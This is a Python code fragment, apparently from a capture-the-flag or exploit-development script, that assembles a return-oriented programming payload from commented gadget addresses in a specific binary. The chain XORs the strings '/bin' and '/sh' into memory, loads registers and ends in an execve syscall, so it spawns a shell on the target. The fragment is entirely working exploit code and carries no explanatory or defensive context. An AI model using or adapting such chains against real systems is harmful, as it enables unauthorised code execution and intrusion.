payload = p64(0x41f274)
#0x41f274: pop rax ; retf
payload += p64(0x76fbe1bc)+p32(0x4149b1)+p32(0x33)
# 0x00000000004149b1: xchg ebx, eax; cmp eax, 0x8948ffff; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x76f82523)+p32(0x410c73)+p32(0x33)
# 0x0000000000410c73: xor dword ptr [rbx - 0x76b70001], eax; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x76fbe18b)+p32(0x4149b1)+p32(0x33)
# 0x00000000004149b1: xchg ebx, eax; cmp eax, 0x8948ffff; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x76b70002)+p32(0x410c73)+p32(0x33)
# 0x0000000000410c73: xor dword ptr [rbx - 0x76b70001], eax; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x76fbe059)+p32(0x4149b1)+p32(0x33)
# 0x00000000004149b1: xchg ebx, eax; cmp eax, 0x8948ffff; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x6e69622f)+p32(0x410c73)+p32(0x33)
# 0x0000000000410c73: xor dword ptr [rbx - 0x76b70001], eax; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x76fbe05d)+p32(0x4149b1)+p32(0x33)
# 0x00000000004149b1: xchg ebx, eax; cmp eax, 0x8948ffff; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x68662f)+p32(0x410c73)+p32(0x33)
# 0x0000000000410c73: xor dword ptr [rbx - 0x76b70001], eax; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x412521)+p32(0x41e113)+p32(0x33)
# 0x000000000041e113: mov esi, 0; mov edi, 1; call rax; 
payload += b''
# 0x0000000000412521: pop r12; pop rbp; ret; 
payload += p64(0x0)+p64(0x41d4b0)
# 0x000000000041d4b0: mov edx, 0x8948fffe; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x36b4dfd0)+p32(0x401314)+p32(0x33)
# 0x0000000000401314: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x44e058)+p32(0x412dc7)+p32(0x33)
# 0x0000000000412dc7: mov edi, eax; call rdx; 
payload += b''
# 0x0000000000412521: pop r12; pop rbp; ret; 
payload += p64(0x0)+p64(0x41d4b0)
# 0x000000000041d4b0: mov edx, 0x8948fffe; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x36b4df9f)+p32(0x401314)+p32(0x33)
# 0x0000000000401314: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x41f274)
# 0x41f274: pop rax ; retf
payload += p64(0x3b)+p32(0x40fbdc)+p32(0x33)
# 0x000000000040fbdc: syscall; 
payload += b''
